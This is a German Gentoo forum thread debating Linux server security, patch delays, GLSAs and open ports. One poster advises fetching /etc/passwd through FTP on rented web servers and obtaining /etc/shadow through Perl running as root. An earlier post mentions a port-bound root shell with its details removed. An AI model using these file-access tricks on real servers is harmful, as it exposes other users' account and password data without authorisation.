das ende vom lied ist eine an einen bestimmten port gebundene rootshell  :Wink: 

ich denke, ich habe alle relevanten teile entfernt, so sollte keine gefahr bestehen.

gruss

----------

## birnbaumtruhe

 *Gekko wrote:*   

> 
> 
> Ausserdem wird ein Exploit nicht geschrieben sondern ist u.U. vorhanden und wird ausgenutzt.
> 
> 

 

Falsch ausgedrückt ...

----------

## Ragin

@norc

1) ich versuche definitiv nicht deinen PC zu hacken.

Das hat auch größtenteils nichts mit schlecht konfigurierten Systemen zu tun, sondern funktioniert auf den meisten Servern, die du mieten kannst. Die Lösung zu diesem Problem ist, dass die wenigsten für jeden Nutzer eine eigene chrooted Umgebung (z.Bsp. per jail) aufsetzen und man dadurch auf Dateien Zugriff hat, die man besser nicht bekommen sollte.

Einfaches Beispiel: hast du einen Webserver irgendwo gemietet? Log dich einfach per Konsole auf den FTP ein (also keine GUI verwenden, da siehst du nix) und mach einfach get /etc/passwd

Im Normalfall siehst du diese Datei nicht, komischerweise kannst du sie aber in den meisten Fällen dadurch saugen. Hast du root Rechte oder dein Perl läuft unter root (was meist der Fall ist) kannst du auch darüber die Dateien besorgen. Teste es einfach!

2) Ein gut geupdatetes System ist in der Regel gegen die meisten Angriffe imun, da die Lücken meist schnell geschlossen werden und der Angreifer nicht mehr über die bekannte Lücke eindringen kann, sondern sich neue Wege suchen muss. Genau das ist auch das Problem bei den meisten exploids. Allerdings kannst du (wie oben schon angemerkt) nicht davon ausgehen, dass du durch ein Update alle Lücken schließt, manchmal bleiben schlichtweg Lücken offen, weil diese nicht nicht gelöst werden konnten oder von den "Findern" noch nicht bekannt gegeben wurden. Gentoo hat den Vorteil. dass du meist die neuen Pakete bekommst (sicher dauert es bei einigen Paketen lang bis Lücken geschlossen werden um carlo zu beruhigen, aber die Updateintervalle sind bei den meisten Paketen doch recht kurz, gerade wenn die Originalversion einen Sprung gemacht hat.

3) Solltest du meinen Ausführungen nicht glauben, so findest du unter folgender URL eine (teilweise sogar genauere) Anleitung und Erklärung zu diesem Thema: Gentoo sicherer machen

----------

## Robelix

 *Ragin wrote:*   

> @norc
> 
> Einfaches Beispiel: hast du einen Webserver irgendwo gemietet? Log dich einfach per Konsole auf den FTP ein (also keine GUI verwenden, da siehst du nix) und mach einfach get /etc/passwd
> 
> Im Normalfall siehst du diese Datei nicht, komischerweise kannst du sie aber in den meisten Fällen dadurch saugen. Hast du root Rechte oder dein Perl läuft unter root (was meist der Fall ist) kannst du auch darüber die Dateien besorgen. Teste es einfach!
> ...

 

Damit die perl-cgi's (die meinst' doch, oder?) als root laufen müßte der Apache mit root-rechten laufen. Das tut er aber hoffentlich nirgends. (bei gentoo ist default ein user namens apache).

Die cgi's laufen entweder mit den Rechten des apachen, oder mit mit Hilfe von suexec mit den Rechten des Users.

Die /etc/passwd wirst' damit trotzdem kriegen, aber was willst' mit der, bei der (eigentlich interessanten) /etc/shadow wird's nicht so einfach sein.

Robelix

----------

## Ragin

 *Robelix wrote:*   

> Damit die perl-cgi's (die meinst' doch, oder?) als root laufen müßte der Apache mit root-rechten laufen. Das tut er aber hoffentlich nirgends. (bei gentoo ist default ein user namens apache).

 

Ob CGI oder nicht spielt in erster Linie keine Rolle. Und wenn du dir mal die Server von vielen Anbietern anschaust wirst du erschreckend feststellen, dass du dort mit root-Rechten arbeiten kannst, wenn du Perl Scripte ausführst. Evtl. gehts auch noch mit cronjobs, wobei da die meisten keine Probleme mehr mit haben.

 *Quote:*   

> Die /etc/passwd wirst' damit trotzdem kriegen, aber was willst' mit der, bei der (eigentlich interessanten) /etc/shadow wird's nicht so einfach sein.

 

Die shadow bekommst nur dann, wenn du root-Rechte hast. Und genau deshalb bin ich auf die unter root laufenden Perl Prozesse eingegangen.

----------

## Robelix

 *Ragin wrote:*   

>  *Robelix wrote:*   Damit die perl-cgi's (die meinst' doch, oder?) als root laufen müßte der Apache mit root-rechten laufen. Das tut er aber hoffentlich nirgends. (bei gentoo ist default ein user namens apache). 
> 
> Ob CGI oder nicht spielt in erster Linie keine Rolle. Und wenn du dir mal die Server von vielen Anbietern anschaust wirst du erschreckend feststellen, dass du dort mit root-Rechten arbeiten kannst, wenn du Perl Scripte ausführst. Evtl. gehts auch noch mit cronjobs, wobei da die meisten keine Probleme mehr mit haben.
> 
> 

 

Wenn dem wahr sein sollte, dann sind weit mehr Vollidioten unterwegs als ich erwartet hätte!

Auf so 'nem thypischen Virtual-host-vermieter sind gut und gerne mal ein paar hundert User d'rauf - und jeder Einzelne könnte problemlos die Kiste übernehmen oder abschießen.

Nein, ich kann's nicht glauben, daß es viele sind...

----------

## Carlo

 *Ragin wrote:*   

> Ein gut geupdatetes System ist in der Regel gegen die meisten Angriffe imun, da die Lücken meist schnell geschlossen werden

 

Bah - guck Dir "meine" Reports an und rechne selber aus, wie lange es im Schnitt gedauert hat oder noch dauert. Bei Samba hat es zuletzt auch zweieinhalb Monate gedauert. Das hat übrigens auch nichts mit beunruhigt sein zu tun, sondern mit dem enormen Wachstum von Gentoo. Die Strukturen sind halt noch nicht so eingefahren, wie beispielsweise bei Debian; Die haben auch einen wesentlich höheren Personalstock. Dazu kommt, daß Gentoo wesentlich aktueller ist und damit potentiell fehleranfälliger. Bei sicherheitsrelevanten Servern auf Gentoo zu setzen, halte ich derzeit jedenfalls noch für fahrlässig, zumindest wenn man sich nur auf GLSAs verläßt.

----------

## Ragin

 *Robelix wrote:*   

> Auf so 'nem thypischen Virtual-host-vermieter sind gut und gerne mal ein paar hundert User d'rauf - und jeder Einzelne könnte problemlos die Kiste übernehmen oder abschießen.

 

Bei Virtual Hosts ist das auch im Normalfall nicht so einfach möglich, da es sich dabei um eine Art chrooted Umgebungen handelt. Wobei mir auch schon aufgefallen ist, dass manche zumindest den root Nutzer mit in diese virtuelle Umgebung kopieren und man dadurch auch an das PW gelangen kann.

 *Carlo wrote:*   

> Bei Samba hat es zuletzt auch zweieinhalb Monate gedauert. Das hat übrigens auch nichts mit beunruhigt sein zu tun, sondern mit dem enormen Wachstum von Gentoo.
> 
> 

 

Ja, aber Samba war deshalb auch nicht in der Version 3.x verfügbar, sondern nur in der stabilen 2.x Version. Wenn man danach geht hat es zwar lang gedauert, aber es wurde auf Grund der Fehler auch kein ebuild in den Portage übernommen, dass potentiell gefährlich ist.

 *Carlo wrote:*   

> Dazu kommt, daß Gentoo wesentlich aktueller ist und damit potentiell fehleranfälliger. Bei sicherheitsrelevanten Servern auf Gentoo zu setzen, halte ich derzeit jedenfalls noch für fahrlässig, zumindest wenn man sich nur auf GLSAs verläßt.

 

Sicher ist Gentoo (gerade in der unstable Version) extrem Fehleranfällig bei neuen Paketen, jedoch ist Debian in der unstable auch nicht viel besser. Wenn ich dann noch an oben genanntes Beispiel von Mandrake und dem SSH denke wird mir Gentoo doch sympathischer.

Die GLSA habe ich ehrlich gesagt noch nie gelesen. Im Normalfall findet man die Meldungen auch eher auf den entsprechenden Seiten der "Hersteller" oder in einschlägigen Linuxforen/magazinen.

Da Gentoo die Pakete nicht so extrem verstümmelt wie andere Distris, sondern im Normalfall nur einige Dinge patched und ansonsten die Originalsourcen verwendet kann man sich auch getrost nach den entsprechenden Meldungen der Hersteller richten. Bei SuSE oder RedHat hätte ich da teilweise Probleme ob der Bug nun da auch zutrifft oder nicht, da die bei manchen Paketen arg umprogrammieren.

----------

## Carlo

 *Ragin wrote:*   

> Ja, aber Samba war deshalb auch nicht in der Version 3.x verfügbar, sondern nur in der stabilen 2.x Version. Wenn man danach geht hat es zwar lang gedauert, aber es wurde auf Grund der Fehler auch kein ebuild in den Portage übernommen, dass potentiell gefährlich ist.

 

Das stimmt nicht für PPC und iirc AMD64. Abgesehen davon gehört so ein Ebuild als Sofortmaßnahme hart maskiert und eine Warnung herausgegeben.

 *Ragin wrote:*   

> Die GLSA habe ich ehrlich gesagt noch nie gelesen. Im Normalfall findet man die Meldungen auch eher auf den entsprechenden Seiten der "Hersteller" oder in einschlägigen Linuxforen/magazinen.

 

Wie schön. Die GLSAs kommen imho schon zu spät, aber Magazine??  :Rolling Eyes:  Wenn man in Stunden bzw. Tagen rechnet, was sicherheitsrelevante Updates angeht - aua!

----------

## Ragin

 *Carlo wrote:*   

> Das stimmt nicht für PPC und iirc AMD64. Abgesehen davon gehört so ein Ebuild als Sofortmaßnahme hart maskiert und eine Warnung herausgegeben.

 

Gut, mit den Systemen habe ich keine Erfahrung. Wobei man auch hier anmerken muss, dass ds Team für diese Prozessorarchitektur wohl eher etwas kleiner ausfällt als das x86 Team.

Das diese Pakete rausgenommen werden müssen stimme ich dir voll und ganz zu.

 *Carlo wrote:*   

> Wie schön. Die GLSAs kommen imho schon zu spät, aber Magazine??  Wenn man in Stunden bzw. Tagen rechnet, was sicherheitsrelevante Updates angeht - aua!

 

Es gibt auch Online-Magazine  :Smile: 

Die sind in der Regel aktueller als die Zeitschriften, von denen du wahrscheinlich ausgehst.

----------

## Carlo

 *Ragin wrote:*   

> Es gibt auch Online-Magazine 
> 
> Die sind in der Regel aktueller als die Zeitschriften, von denen du wahrscheinlich ausgehst.

 

Ja, ich war von letzteren ausgegangen. Erstere sind aber auch nur ein (verzögernder) Filter, der funktionieren kann, aber nicht muß.

edit:

 *Ragin wrote:*   

> Wobei man auch hier anmerken muss, dass ds Team für diese Prozessorarchitektur wohl eher etwas kleiner ausfällt als das x86 Team.

 

Für die Fehlerbeseitigung sind Maintainer/Herd zuständig und meist hakt es da, wenn es denn hakt. Auf den verschiedenen Plattformen wird nur noch getestet, ob's auch läuft.

----------

## Ragin

Eine gewisse Unsicherheit besteht immer. Die besteht aber auch bei SunSolaris, RedHat, SuSE usw.

Kein System ist so perfekt, dass es keine Sicherheitslücken und somit potentielle Angriffsfläche gibt.

Man muss halt einfach etwas hinterher sein.

----------

## norc

OK....................................

Wie wär es wenn ich nie behauptet hätte, dass so etwas unmöglich wär??

Damit wär ich wieder rehabilitiert;)

Aber, es ist nicht einfach, überhaupt nicht einfach. 

Und es gibt nicht übermäßig viele Leute, die sich diese Arbeit machen...

Ich denke, damit bin ich überzeugt, und nicht so Lernresistent, wie McPringle sagte....

Danke für alle die sich die Mühe gemacht haben mich vom Gegenteil zu überzeugen, und für, die die diese Threads geschrieben haben.

(Also ich hab jetzt nichts gesagt ja??)   :Wink: 

----------

## Ragin

Das es sooo extrem einfach ist hat auch niemals jemand behauptet, auch wenn es recht simpel klingt.

----------

## Lenz

Wir wollten Dir ja eigentlich nur zeigen, dass es nicht angebracht ist, sich zurückzulehnen und zu meinen, Linux wäre sicher.

----------

## ady1980

 *sirro wrote:*   

>  *Ragin wrote:*   Ich habs bisher zumindest noch nicht hinbekommen, dass das System ohne nen gültigen smtp (min. ssmtp) ordentlich läuft. Und somit ist ein Port offen. 
> 
> Ich schon. Keine seltsamen Fehlermeldungen oder sonstiges. Ein smtp-server läuft nicht.
> 
> Übrigens geht das auch ohne Probleme mit Windows, wie der Rechner meiner Schwester beweist.

 

Bei mir kommen auch nicht solche meldungen, entsprechend im syslog-ng konfiguriert...

Aber wo ich schonmal hier schreibe, nmap hat mir folgendes aufgelistet:

4000/tcp open  remoteanything

Was kann das sein?

ady1980

----------

## kurt

Hallo

4000/tcp = ICQ

Gruss

kurt

----------

## Anarcho

Für manche Sachen ist ein sendmail ganz sinnvoll (cron z.b.) aber das bedeutet ja nicht das man einen smtp-server aufsetzen muss.

----------

## Sumpfdrache

@norc:

Es ist unglaublich, wie Du Dich hier aufführst und spricht für die *extrem* weiten Herzen der Poster, die Dir trotz Deiner Unverschämtheiten unermüdlich antworten. 

Kuck Dir das da mal an...

http://www.dets-home.de/it-writings/smart-questions-ger.html

...und fall dann auf die Kniehe und danke Gott, daß Dir überhaupt jemand geschrieben hat!!

----------

